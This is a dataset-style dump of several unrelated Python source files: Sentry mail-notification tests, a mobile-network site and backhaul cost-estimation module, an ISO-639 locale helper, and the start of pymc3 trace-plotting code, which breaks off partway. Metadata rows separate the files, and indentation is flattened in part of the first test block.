def test_notify_digest_single_record(self, send_async, notify):
    # A single-event digest degrades to the regular notify() path.
    project = self.event.project
    rule = project.rule_set.all()[0]
    digest = build_digest(
        project,
        (event_to_record(self.event, (rule, )), ),
    )
    self.plugin.notify_digest(project, digest)
    # FIX: replaced `is 1` (identity comparison with an int literal,
    # dependent on CPython small-int caching) with `== 1`.
    assert send_async.call_count == 1
    assert notify.call_count == 1
@mock.patch(
'sentry.models.ProjectOption.objects.get_value',
Mock(side_effect=lambda p, k, d: "[Example prefix] " if k == "mail:subject_prefix" else d)
)
def test_notify_digest_subject_prefix(self):
project = self.event.project
rule = project.rule_set.all()[0]
digest = build_digest(
project,
(
event_to_record(self.create_event(group=self.create_group()), (rule, )),
event_to_record(self.event, (rule, )),
),
)
with self.tasks():
self.plugin.notify_digest(project, digest)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject.startswith('[Example prefix]')
def test_assignment(self):
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.ASSIGNED,
user=self.create_user('foo@example.com'),
data={
'assignee': six.text_type(self.user.id),
'assigneeType': 'user',
},
)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_assignment_team(self):
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.ASSIGNED,
user=self.create_user('foo@example.com'),
data={
'assignee': six.text_type(self.project.teams.first().id),
'assigneeType': 'team',
},
)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) == 1
msg = mail.outbox[0]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_note(self):
user_foo = self.create_user('foo@example.com')
activity = Activity.objects.create(
project=self.project,
group=self.group,
type=Activity.NOTE,
user=user_foo,
data={
'text': 'sup guise',
},
)
self.project.teams.first().organization.member_set.create(user=user_foo)
with self.tasks():
self.plugin.notify_about_activity(activity)
assert len(mail.outbox) >= 1
msg = mail.outbox[-1]
assert msg.subject == 'Re: [Sentry] BAR-1 - \xe3\x81\x93\xe3\x82\x93\xe3\x81\xab\xe3\x81\xa1\xe3\x81\xaf'
assert msg.to == [self.user.email]
def test_notify_with_suspect_commits(self):
release = self.create_release(project=self.project, user=self.user)
group = self.create_group(project=self.project, first_release=release)
event = self.create_event(group=group, tags={'sentry:release': release.version})
notification = Notification(event=event)
with self.tasks(), self.options({'system.url-prefix': 'http://example.com'}), self.feature('organizations:suggested-commits'):
self.plugin.notify(notification)
assert len(mail.outbox) >= 1
msg = mail.outbox[-1]
assert 'Suspect Commits' in msg.body
class MailPluginSignalsTest(TestCase):
    """Tests for signal-driven MailPlugin emails (e.g. new user feedback)."""

    @fixture
    def plugin(self):
        return MailPlugin()

    def test_user_feedback(self):
        """A 'user-reports.created' signal should email org members with a
        feedback-specific subject line."""
        user_foo = self.create_user('foo@example.com')

        report = UserReport.objects.create(
            project=self.project,
            group=self.group,
            name='Homer Simpson',
            email='homer.simpson@example.com'
        )

        # The recipient must be an organization member.
        self.project.teams.first().organization.member_set.create(user=user_foo)

        with self.tasks():
            self.plugin.handle_signal(
                name='user-reports.created',
                project=self.project,
                payload={
                    'report': serialize(report, AnonymousUser(), UserReportWithGroupSerializer()),
                },
            )

        assert len(mail.outbox) == 1

        msg = mail.outbox[0]

        assert msg.subject == u'[Sentry] {} - New Feedback from Homer Simpson'.format(
            self.group.qualified_short_id,
        )
        assert msg.to == [self.user.email]
class ActivityEmailTestCase(TestCase):
    """Tests for ActivityEmail participant resolution and subject prefixing."""

    def get_fixture_data(self, users):
        """Build an org/team/project/group plus `users` subscribed members.

        Returns (group, [user, ...]).
        """
        organization = self.create_organization(owner=self.create_user())
        team = self.create_team(organization=organization)
        project = self.create_project(organization=organization, teams=[team])
        group = self.create_group(project=project)

        users = [self.create_user() for _ in range(users)]

        for user in users:
            self.create_member([team], user=user, organization=organization)
            GroupSubscription.objects.subscribe(group, user)

        return group, users

    def test_get_participants(self):
        group, (actor, other) = self.get_fixture_data(2)

        email = ActivityEmail(Activity(
            project=group.project,
            group=group,
            user=actor,
        ))

        # The acting user is excluded from participants by default...
        assert set(email.get_participants()) == set([other])

        # ...unless they opted in to self notifications.
        UserOption.objects.set_value(user=actor, key='self_notifications', value='1')

        assert set(email.get_participants()) == set([actor, other])

    def test_get_participants_without_actor(self):
        group, (user, ) = self.get_fixture_data(1)

        email = ActivityEmail(Activity(
            project=group.project,
            group=group,
        ))

        assert set(email.get_participants()) == set([user])

    def test_get_subject(self):
        group, (user, ) = self.get_fixture_data(1)

        email = ActivityEmail(Activity(
            project=group.project,
            group=group,
        ))

        # Stub the project option store so only the subject prefix is defined.
        with mock.patch('sentry.models.ProjectOption.objects.get_value') as get_value:
            get_value.side_effect = lambda project, key, default=None: \
                "[Example prefix] " if key == "mail:subject_prefix" else default
            assert email.get_subject_with_prefix().startswith('[Example prefix] ')
class MailPluginOwnersTest(TestCase):
    """Tests for ownership-rule based recipient resolution in MailPlugin."""

    @fixture
    def plugin(self):
        return MailPlugin()

    def setUp(self):
        from sentry.ownership.grammar import Rule
        self.user = self.create_user(email='foo@example.com', is_active=True)
        self.user2 = self.create_user(email='baz@example.com', is_active=True)

        self.organization = self.create_organization(owner=self.user)
        self.team = self.create_team(organization=self.organization)

        self.project = self.create_project(name='Test', teams=[self.team])
        OrganizationMemberTeam.objects.create(
            organizationmember=OrganizationMember.objects.get(
                user=self.user,
                organization=self.organization,
            ),
            team=self.team,
        )
        self.create_member(user=self.user2, organization=self.organization, teams=[self.team])
        self.group = self.create_group(
            first_seen=timezone.now(),
            last_seen=timezone.now(),
            project=self.project,
            message='hello world',
            logger='root',
        )
        # Ownership rules: *.py -> whole team, *.jx -> user2 only,
        # *.cbl -> both users. fallthrough=True falls back to all members.
        ProjectOwnership.objects.create(
            project_id=self.project.id,
            schema=dump_schema([
                Rule(Matcher('path', '*.py'), [
                    Owner('team', self.team.slug),
                ]),
                Rule(Matcher('path', '*.jx'), [
                    Owner('user', self.user2.email),
                ]),
                Rule(Matcher('path', '*.cbl'), [
                    Owner('user', self.user.email),
                    Owner('user', self.user2.email),
                ])
            ]),
            fallthrough=True,
        )

    def make_event_data(self, filename, url='http://example.com'):
        """Build normalized event data with a single stack frame at `filename`,
        so ownership path matchers can be exercised."""
        mgr = EventManager({
            'tags': [('level', 'error')],
            'stacktrace': {
                'frames': [
                    {
                        'lineno': 1,
                        'filename': filename,
                    },
                ],
            },
            'request': {
                'url': url
            },
        })
        mgr.normalize()
        data = mgr.get_data()
        event_type = mgr.get_event_type()
        data['type'] = event_type.key
        data['metadata'] = event_type.get_metadata(data)
        return data

    def assert_notify(self, event, emails_sent_to):
        """Notify for `event` and assert exactly `emails_sent_to` received mail."""
        mail.outbox = []
        with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
            self.plugin.notify(Notification(event=event))
        assert len(mail.outbox) == len(emails_sent_to)
        assert sorted(email.to[0] for email in mail.outbox) == sorted(emails_sent_to)

    def test_get_send_to_with_team_owners(self):
        # *.py matches the team rule -> every team member.
        event = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.py')
        )
        assert (sorted(set([self.user.pk, self.user2.pk])) == sorted(
            self.plugin.get_send_to(self.project, event.data)))

    def test_get_send_to_with_user_owners(self):
        # *.cbl matches the two-user rule.
        event = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.cbl')
        )
        assert (sorted(set([self.user.pk, self.user2.pk])) == sorted(
            self.plugin.get_send_to(self.project, event.data)))

    def test_get_send_to_with_user_owner(self):
        # *.jx matches the single-user rule.
        event = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.jx')
        )
        assert (sorted(set([self.user2.pk])) == sorted(
            self.plugin.get_send_to(self.project, event.data)))

    def test_get_send_to_with_fallthrough(self):
        event = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.jx')
        )
        assert (sorted(set([self.user2.pk])) == sorted(
            self.plugin.get_send_to(self.project, event.data)))

    def test_get_send_to_without_fallthrough(self):
        # With fallthrough disabled, a non-matching path yields no recipients.
        ProjectOwnership.objects.get(project_id=self.project.id).update(fallthrough=False)
        event = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.cpp')
        )
        assert [] == sorted(self.plugin.get_send_to(self.project, event.data))

    def test_notify_users_with_owners(self):
        event_all_users = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.cbl'),
        )
        self.assert_notify(event_all_users, [self.user.email, self.user2.email])

        event_team = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.py'),
        )
        self.assert_notify(event_team, [self.user.email, self.user2.email])

        event_single_user = Event(
            group=self.group,
            message=self.group.message,
            project=self.project,
            datetime=self.group.last_seen,
            data=self.make_event_data('foo.jx'),
        )
        self.assert_notify(event_single_user, [self.user2.email])
| 34.60597 | 134 | 0.608169 |
32059d38dc84186bbc0a900fc3c110da6c15d232 | 11,268 | py | Python | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | 4 | 2021-02-07T19:36:57.000Z | 2021-05-20T16:46:02.000Z | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | null | null | null | src/podis/supply.py | edwardoughton/ictp4d | 0e36b3c4515e57cc9210bd22f2ab761f2aa750d6 | [
"MIT"
] | null | null | null | """
Optimize supply
Written by Ed Oughton.
Winter 2020
"""
import math
from itertools import tee
from operator import itemgetter
from podis.costs import find_network_cost
def estimate_supply(country, regions, capacity_lut, option, global_parameters,
                    country_parameters, costs, core_lut, ci):
    """
    For each region, find the least-cost design and estimate
    the required investment for for the single network being modeled.

    Parameters
    ----------
    country : dict
        Country information.
    regions : list of dicts
        Data for all regions (one dict per region).
    capacity_lut : dict
        A dictionary containing the lookup capacities.
    option : dict
        Contains the scenario and strategy. The strategy string controls
        the strategy variants being tested in the model and is defined based
        on the type of technology generation, core and backhaul, and the
        strategy for infrastructure sharing, the number of networks in each
        geotype, spectrum and taxation.
    global_parameters : dict
        All global model parameters.
    country_parameters : dict
        All country specific parameters.
    costs : dict
        All equipment costs.
    core_lut : dict
        Contains the number of existing and required, core and regional assets.
    ci : int
        Confidence interval.

    Returns
    -------
    regions : list of dicts
        Data for all regions (one dict per region); each region dict is
        mutated in place with density, upgrade and cost fields.

    """
    output_regions = []

    for region in regions:
        # Least-cost site density (sites per km^2) that meets regional demand.
        region['mno_site_density'] = find_site_density(region, option,
            global_parameters, country_parameters, capacity_lut, ci)

        total_sites_required = math.ceil(region['mno_site_density'] *
            region['area_km2'])

        # Split the requirement into greenfield builds vs. brownfield upgrades.
        region = estimate_site_upgrades(
            region,
            option['strategy'],
            total_sites_required,
            country_parameters
        )

        # Backhaul links needing upgrade for the strategy's backhaul type.
        region = estimate_backhaul_upgrades(region, option['strategy'], country_parameters)

        # Translate the physical design into an investment estimate.
        region = find_network_cost(
            region,
            option,
            costs,
            global_parameters,
            country_parameters,
            core_lut,
        )

        # Tag the result with the run parameters for downstream aggregation.
        region['scenario'] = option['scenario']
        region['strategy'] = option['strategy']
        region['confidence'] = ci

        output_regions.append(region)

    return output_regions
def find_site_density(region, option, global_parameters, country_parameters,
                      capacity_lut, ci):
    """
    For a given region, estimate the number of needed sites.

    Parameters
    ----------
    region : dicts
        Data for a single region.
    option : dict
        Contains the scenario and strategy. The strategy string controls
        the strategy variants being tested in the model and is defined based
        on the type of technology generation, core and backhaul, and the
        strategy for infrastructure sharing, the number of networks in each
        geotype, spectrum and taxation.
    global_parameters : dict
        All global model parameters.
    country_parameters : dict
        All country specific parameters.
    capacity_lut : dict
        A dictionary containing the lookup capacities.
    ci : int
        Confidence interval.

    Return
    ------
    site_density : float
        Estimated site density (sites per km^2).

    """
    demand = region['demand_mbps_km2']
    geotype = region['geotype'].split(' ')[0]
    ant_type = 'macro'
    generation = option['strategy'].split('_')[0]
    frequencies = country_parameters['frequencies']
    frequencies = frequencies[generation]
    ci = str(ci)

    # Pass 1: collect every candidate site density present in the LUT
    # for the relevant bands.
    unique_densities = set()

    capacity = 0

    for item in frequencies:

        frequency = str(item['frequency'])
        bandwidth = str(item['bandwidth'].split('x')[1])

        density_capacities = lookup_capacity(
            capacity_lut,
            geotype,
            ant_type,
            frequency,
            generation,
            ci
        )

        for item in density_capacities:
            site_density, capacity = item
            unique_densities.add(site_density)

    # Pass 2: aggregate capacity across all bands at each candidate density.
    density_lut = []

    for density in list(unique_densities):
        capacity = 0
        for item in frequencies:

            frequency = str(item['frequency'])
            channels, bandwidth = item['bandwidth'].split('x')
            channels, bandwidth = float(channels), float(bandwidth)

            if channels == 1: #allocate downlink channel width when using TDD
                downlink = float(global_parameters['tdd_dl_to_ul'].split(':')[0])
                bandwidth = bandwidth * (downlink / 100)

            density_capacities = lookup_capacity(
                capacity_lut,
                geotype,
                ant_type,
                frequency,
                generation,
                ci
            )

            for density_capacity in density_capacities:

                if density_capacity[0] == density:
                    capacity += density_capacity[1]

        density_lut.append((density, capacity))

    density_lut = sorted(density_lut, key=lambda tup: tup[0])

    max_density, max_capacity = density_lut[-1]
    min_density, min_capacity = density_lut[0]

    # NOTE(review): `bandwidth` here is whatever value the *last* frequency
    # item left behind in the loop above (LUT capacities appear to be per-MHz,
    # so they are scaled by a bandwidth) — confirm that scaling by a single
    # band's bandwidth rather than a per-band value is intended.
    max_capacity = max_capacity * bandwidth
    min_capacity = min_capacity * bandwidth

    if demand > max_capacity:
        # Demand exceeds anything in the LUT: return the densest option.
        return max_density

    elif demand < min_capacity:
        # Demand is below the sparsest option: return the minimum density.
        return min_density

    else:
        # Linearly interpolate between the two bracketing LUT entries.
        for a, b in pairwise(density_lut):

            lower_density, lower_capacity = a
            upper_density, upper_capacity = b

            lower_capacity = lower_capacity * bandwidth
            upper_capacity = upper_capacity * bandwidth

            if lower_capacity <= demand < upper_capacity:

                site_density = interpolate(
                    lower_capacity, lower_density,
                    upper_capacity, upper_density,
                    demand
                )
                return site_density
def lookup_capacity(capacity_lut, env, ant_type, frequency,
                    generation, ci):
    """
    Use lookup table to find the combination of spectrum bands
    which meets capacity by clutter environment geotype, frequency,
    bandwidth, technology generation and site density.

    Parameters
    ----------
    capacity_lut : dict
        A dictionary containing the lookup capacities, keyed by
        (env, ant_type, frequency, generation, ci) tuples.
    env : string
        The settlement type e.g. urban, suburban or rural.
    ant_type : string
        The antenna type, such as a macro cell or micro cell.
    frequency : string
        The frequency band in Megahertz.
    generation : string
        The cellular generation such as 4G or 5G.
    ci : int
        Confidence interval.

    Returns
    -------
    site_densities_to_capacities : list of tuples
        Returns a list of site density to capacity tuples.

    Raises
    ------
    KeyError
        If the parameter combination is not present in the lookup table.

    """
    key = (env, ant_type, frequency, generation, ci)

    if key not in capacity_lut:
        # Fix: the original passed the tuple as a *second argument* to
        # KeyError (logging-style "%s" call), so the message was never
        # formatted. Format it explicitly instead.
        raise KeyError("Combination %s not found in lookup table" % str(key))

    return capacity_lut[key]
def interpolate(x0, y0, x1, y1, x):
    """Linearly interpolate the y-value at *x* on the line through
    (x0, y0) and (x1, y1)."""
    weight_lower = x1 - x   # pull toward y0 when x is near x0
    weight_upper = x - x0   # pull toward y1 when x is near x1
    return (y0 * weight_lower + y1 * weight_upper) / (x1 - x0)
def pairwise(iterable):
    """
    Yield consecutive overlapping 2-tuples from *iterable*.

    >>> list(pairwise([1,2,3,4]))
    [(1, 2), (2, 3), (3, 4)]
    """
    iterator = iter(iterable)
    try:
        previous = next(iterator)
    except StopIteration:
        return
    for current in iterator:
        yield previous, current
        previous = current
def estimate_site_upgrades(region, strategy, total_sites_required,
                           country_parameters):
    """
    Estimate the number of greenfield sites and brownfield upgrades for the
    single network being modeled.

    Parameters
    ----------
    region : dict
        Contains all regional data; mutated in place with
        'existing_mno_sites', 'new_mno_sites' and 'upgraded_mno_sites'.
    strategy : dict
        Controls the strategy variants being tested in the model and is
        defined based on the type of technology generation, core and
        backhaul, and the level of sharing, subsidy, spectrum and tax.
    total_sites_required : int
        Number of sites needed to meet demand.
    country_parameters : dict
        All country specific parameters.

    Returns
    -------
    region : dict
        Contains all regional data.

    """
    generation = strategy.split('_')[0]
    geotype = region['geotype'].split(' ')[0]

    # Number of networks sharing the area's infrastructure.
    network_count = country_parameters['networks']['baseline' + '_' + geotype]

    # This MNO's share of all existing sites (2G-4G).
    existing_sites = region['total_estimated_sites'] / network_count
    region['existing_mno_sites'] = existing_sites

    # This MNO's share of existing 4G sites.
    existing_4g_sites = math.ceil(region['sites_4G'] / network_count)

    if total_sites_required > existing_sites:
        # Shortfall: build new sites and upgrade everything non-4G.
        region['new_mno_sites'] = (int(round(total_sites_required -
            existing_sites)))
        if existing_sites <= 0:
            region['upgraded_mno_sites'] = 0
        elif generation == '4G' and existing_4g_sites > 0:
            region['upgraded_mno_sites'] = existing_sites - existing_4g_sites
        else:
            region['upgraded_mno_sites'] = existing_sites
    else:
        # Enough sites already exist; only upgrades may be needed.
        region['new_mno_sites'] = 0
        if generation == '4G' and existing_4g_sites > 0:
            shortfall = total_sites_required - existing_4g_sites
            region['upgraded_mno_sites'] = shortfall if shortfall >= 0 else 0
        else:
            region['upgraded_mno_sites'] = total_sites_required

    return region
def estimate_backhaul_upgrades(region, strategy, country_parameters):
    """
    Estimates the number of backhaul links requiring upgrades for the
    single network being modeled.

    Parameters
    ----------
    region : dict
        Contains all regional data; mutated in place with 'backhaul_new'
        when the strategy's backhaul type is 'fiber' or 'wireless'.
    strategy : dict
        The strategy string controls the strategy variants being tested in the
        model and is defined based on the type of technology generation, core
        and backhaul, and the level of sharing, subsidy, spectrum and tax.
    country_parameters : dict
        All country specific parameters.

    Returns
    -------
    region : dict
        Contains all regional data.

    """
    backhaul_type = strategy.split('_')[2]
    geotype = region['geotype'].split(' ')[0]
    network_count = country_parameters['networks']['baseline' + '_' + geotype]

    # Every new or upgraded site needs a backhaul link.
    sites_needing_backhaul = (region['new_mno_sites'] +
                              region['upgraded_mno_sites'])

    if backhaul_type == 'fiber':
        # Only existing fiber counts toward a fiber strategy.
        existing_links = region['backhaul_fiber'] / network_count
        shortfall = sites_needing_backhaul - existing_links
        region['backhaul_new'] = math.ceil(shortfall) if shortfall > 0 else 0

    elif backhaul_type == 'wireless':
        # Wireless strategies can reuse existing fiber links too.
        existing_links = (region['backhaul_wireless'] +
                          region['backhaul_fiber']) / network_count
        shortfall = sites_needing_backhaul - existing_links
        region['backhaul_new'] = math.ceil(shortfall) if shortfall > 0 else 0

    return region
| 30.128342 | 91 | 0.627707 |
2615ee2e78efa1c3d3a525d37c7990a0ec2cec7e | 3,957 | py | Python | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | 3 | 2020-01-11T13:55:38.000Z | 2020-08-25T22:34:15.000Z | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | null | null | null | sagas/nlu/locales.py | samlet/stack | 47db17fd4fdab264032f224dca31a4bb1d19b754 | [
"Apache-2.0"
] | 1 | 2021-01-01T05:21:44.000Z | 2021-01-01T05:21:44.000Z | def get_locale(lang):
"""
import sagas.nlu.locales as locales
locales.get_locale('ja')
:param lang:
:return:
"""
from iso639 import languages
aragonese = languages.get(part1=lang)
return aragonese.part3
class LocaleTable(object):
    """A mapping keyed by (language, display-locale) 2-tuples.

    Indexing with anything other than a two-element key raises ValueError;
    missing keys raise KeyError, matching plain dict behavior.
    """

    def __init__(self):
        # Backing store: {(lang, loc): display_name}
        self.data = {}

    def __getitem__(self, key):
        lang, loc = key  # enforce a two-element key
        return self.data[lang, loc]

    def __setitem__(self, key, value):
        lang, loc = key  # enforce a two-element key
        self.data[lang, loc] = value
class Locales(object):
    """ISO-639 language-code utilities.

    Combines a small static table of display names (``self.table``) with a
    part1<->part3 code map loaded from ``iso-639.json``:

    * ``iso_map``: part1 code ('en') -> part3 code ('eng')
    * ``rev_map``: part3 code ('eng') -> part1 code ('en')
    """

    def __init__(self):
        import json_utils  # NOTE(review): appears unused here — confirm before removing
        from sagas.conf import resource_json
        # t = dd(lambda: dd(unicode))
        # Static (language, display-locale) -> display-name table.
        t = LocaleTable()
        t['eng', 'eng'] = 'English'
        t['eng', 'ind'] = 'Inggeris'
        t['eng', 'zsm'] = 'Inggeris'
        t['ind', 'eng'] = 'Indonesian'
        t['ind', 'ind'] = 'Bahasa Indonesia'
        t['ind', 'zsm'] = 'Bahasa Indonesia'
        t['zsm', 'eng'] = 'Malaysian'
        t['zsm', 'ind'] = 'Bahasa Malaysia'
        t['zsm', 'zsm'] = 'Bahasa Malaysia'
        t['msa', 'eng'] = 'Malay'
        t["swe", "eng"] = "Swedish"
        t["ell", "eng"] = "Greek"
        t["cmn", "eng"] = "Chinese (simplified)"
        t["qcn", "eng"] = "Chinese (traditional)"
        t['eng', 'cmn'] = u'英语'
        t['cmn', 'cmn'] = u'汉语'
        t['qcn', 'cmn'] = u'漢語'
        t['cmn', 'qcn'] = u'汉语'
        t['qcn', 'qcn'] = u'漢語'
        t['jpn', 'cmn'] = u'日语'
        t['jpn', 'qcn'] = u'日语'
        t['als', 'eng'] = 'Albanian'
        t['arb', 'eng'] = 'Arabic'
        t['cat', 'eng'] = 'Catalan'
        t['dan', 'eng'] = 'Danish'
        t['eus', 'eng'] = 'Basque'
        t['fas', 'eng'] = 'Farsi'
        t['fin', 'eng'] = 'Finnish'
        t['fra', 'eng'] = 'French'
        t['glg', 'eng'] = 'Galician'
        t['heb', 'eng'] = 'Hebrew'
        t['ita', 'eng'] = 'Italian'
        t['jpn', 'eng'] = 'Japanese'
        t['mkd', 'eng'] = 'Macedonian'
        t['nno', 'eng'] = 'Nynorsk'
        t['nob', 'eng'] = u'Bokmål'
        t['pol', 'eng'] = 'Polish'
        t['por', 'eng'] = 'Portuguese'
        t['slv', 'eng'] = 'Slovene'
        t['spa', 'eng'] = 'Spanish'
        t['tha', 'eng'] = 'Thai'
        self.table = t

        # part1 -> part3 map (see get_code_by_part1), and its inverse.
        self.iso_map = resource_json('iso-639.json')
        self.rev_map = {v: k for k, v in self.iso_map.items()}

    def get_def(self, part3):
        """Return the iso639 language record for a part3 code, or None if unknown."""
        from iso639 import languages
        try:
            loc = languages.get(part3=part3)
        except KeyError:
            loc = None
        return loc

    def get_code_by_part1(self, lang_part1):
        """Map a part1 code ('en') to (part3 code, language record).

        $ python -m sagas.nlu.locales get_code_by_part1 en
        :param lang_part1: two-letter ISO 639-1 code
        :return: (part3 code, iso639 record) or ('', None) if unknown
        """
        if lang_part1 in self.iso_map:
            code = self.iso_map[lang_part1]
            return code, self.get_def(code)
        return '', None

    def get_code_by_part3(self, lang_part3):
        """Map a part3 code ('eng') to (part1 code, language record).

        :param lang_part3: three-letter ISO 639-3 code
        :return: (part1 code, iso639 record) or ('', None) if unknown
        """
        if lang_part3 in self.rev_map:
            # BUG FIX: the reverse lookup must use rev_map (part3 -> part1).
            # The original indexed iso_map (part1 -> part3) with a part3
            # code, raising KeyError for any language whose part3 code is
            # not coincidentally also a part1 key.
            return self.rev_map[lang_part3], self.get_def(lang_part3)
        return '', None

    def locale(self, lang):
        """Return the English display name for a part3 code from the static table.

        $ python -m sagas.nlu.locales locale 'cmn'
        :param lang: part3 code present in the static table
        :return: English display name (KeyError if not in the table)
        """
        return self.table[lang, 'eng']

    def nltk_locales(self):
        """Print the languages supported by NLTK's wordnet corpus.

        $ python -m sagas.nlu.locales nltk_locales
        :return: None (prints a table)
        """
        from nltk.corpus import wordnet as wn
        from iso639 import languages
        import sagas
        langs = wn.langs()
        print(len(langs), sorted(langs))
        rs = []
        # 'qcn' has no iso639 record, so it is skipped.
        excepts = ['qcn']
        for lang in langs:
            if lang not in excepts:
                loc = languages.get(part3=lang)
                rs.append((loc.part3, loc.macro, loc.name))
        df = sagas.to_df(rs, ['code', 'micro', 'name'])
        sagas.print_df(df)
# Shared module-level singleton; the display-name table and iso-639.json
# are loaded once at import time.
iso_locales = Locales()

def is_available(lang):
    # True when `lang` is a known ISO 639-1 (part1) code.
    return lang in iso_locales.iso_map

if __name__ == '__main__':
    import fire
    fire.Fire(Locales)
| 28.467626 | 69 | 0.504423 |
7d4f1d3338a26437609408533209b6e613b519e7 | 16,820 | py | Python | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | 1 | 2020-09-29T12:32:32.000Z | 2020-09-29T12:32:32.000Z | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/plots.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from scipy.stats import kde
from .stats import *
from numpy.linalg import LinAlgError
__all__ = ['traceplot', 'kdeplot', 'kde2plot', 'forestplot', 'autocorrplot']
def traceplot(trace, vars=None, figsize=None,
              lines=None, combined=False, grid=True,
              alpha=0.35, ax=None):
    """Plot samples histograms and values

    Parameters
    ----------

    trace : result of MCMC run
    vars : list of variable names
        Variables to be plotted, if None all variable are plotted
    figsize : figure size tuple
        If None, size is (12, num of variables * 2) inch
    lines : dict
        Dictionary of variable name / value  to be overplotted as vertical
        lines to the posteriors and horizontal lines on sample values
        e.g. mean of posteriors, true values of a simulation
    combined : bool
        Flag for combining multiple chains into a single chain. If False
        (default), chains will be plotted separately.
    grid : bool
        Flag for adding gridlines to histogram. Defaults to True.
    ax : axes
        Matplotlib axes. Defaults to None.

    Returns
    -------

    ax : matplotlib axes
    """
    import matplotlib.pyplot as plt

    if vars is None:
        vars = trace.varnames

    n = len(vars)

    if figsize is None:
        figsize = (12, n*2)

    if ax is None:
        fig, ax = plt.subplots(n, 2, squeeze=False, figsize=figsize)
    elif ax.shape != (n,2):
        # Caller-supplied axes must be an (n_vars, 2) grid.
        print('traceplot requires n*2 subplots')
        return None

    for i, v in enumerate(vars):
        # One iteration per chain unless `combined` merges them.
        for d in trace.get_values(v, combine=combined, squeeze=False):
            d = np.squeeze(d)
            d = make_2d(d)
            # Integer samples get a histogram; floats get a KDE curve.
            if d.dtype.kind == 'i':
                histplot_op(ax[i, 0], d, alpha=alpha)
            else:
                kdeplot_op(ax[i, 0], d)
            ax[i, 0].set_title(str(v))
            ax[i, 0].grid(grid)
            ax[i, 1].set_title(str(v))
            ax[i, 1].plot(d, alpha=alpha)

            ax[i, 0].set_ylabel("Frequency")
            ax[i, 1].set_ylabel("Sample value")

            if lines:
                try:
                    # Overplot reference value for this variable, if given.
                    ax[i, 0].axvline(x=lines[v], color="r", lw=1.5)
                    ax[i, 1].axhline(y=lines[v], color="r", lw=1.5, alpha=alpha)
                except KeyError:
                    pass

    plt.tight_layout()
    return ax
def histplot_op(ax, data, alpha=.35):
    """Draw a left-aligned integer histogram on *ax* for each column of *data*.

    Bin edges are every integer between the column min and max (capped at
    roughly 100 bins by widening the step).
    """
    n_columns = data.shape[1]
    for col in range(n_columns):
        values = data[:, col]
        lo = np.min(values)
        hi = np.max(values)
        # Widen the bin step so at most ~100 bins are drawn.
        bin_step = max((hi - lo) // 100, 1)
        ax.hist(values, bins=range(lo, hi + 2, bin_step), alpha=alpha, align='left')
        ax.set_xlim(lo - .5, hi + .5)
def kdeplot_op(ax, data):
    """Draw a Gaussian KDE curve on *ax* for every column of *data*.

    Columns whose KDE cannot be computed (singular covariance, e.g. a
    constant column) are collected and reported as a warning on the axes.
    """
    errored = []
    for i in range(data.shape[1]):
        d = data[:, i]
        try:
            density = kde.gaussian_kde(d)
            l = np.min(d)
            u = np.max(d)
            # Evaluate the density on 100 evenly spaced points over [l, u].
            x = np.linspace(0, 1, 100) * (u - l) + l
            ax.plot(x, density(x))
        except LinAlgError:
            errored.append(i)

    if errored:
        # Coordinates are in axes-ish units; this annotates rather than plots.
        ax.text(.27,.47, 'WARNING: KDE plot failed for: ' + str(errored), style='italic',
                bbox={'facecolor':'red', 'alpha':0.5, 'pad':10})
def make_2d(a):
    """Ravel all dimensions after the first into one trailing axis.

    A 1-D input of length n becomes shape (n, 1); an (n, d1, d2, ...) input
    becomes (n, d1*d2*...) using Fortran (column-major) order.

    Parameters
    ----------
    a : np.ndarray

    Returns
    -------
    np.ndarray with ndim == 2
    """
    a = np.atleast_2d(a.T).T
    # flatten out dimensions beyond the first
    n = a.shape[0]
    # Fix: np.product was deprecated and removed in NumPy 2.0; np.prod is
    # the supported spelling. int() replaces .astype(int) on the scalar.
    newshape = int(np.prod(a.shape[1:]))
    a = a.reshape((n, newshape), order='F')
    return a
def kde2plot_op(ax, x, y, grid=200):
    """Render a 2-D Gaussian KDE of the samples (x, y) as an image on *ax*.

    Parameters
    ----------
    ax : matplotlib axes
    x, y : 1-D sample arrays of equal length
    grid : int
        Number of evaluation points per axis (default 200).
    """
    # Fix: `plt` was referenced here but matplotlib.pyplot is only imported
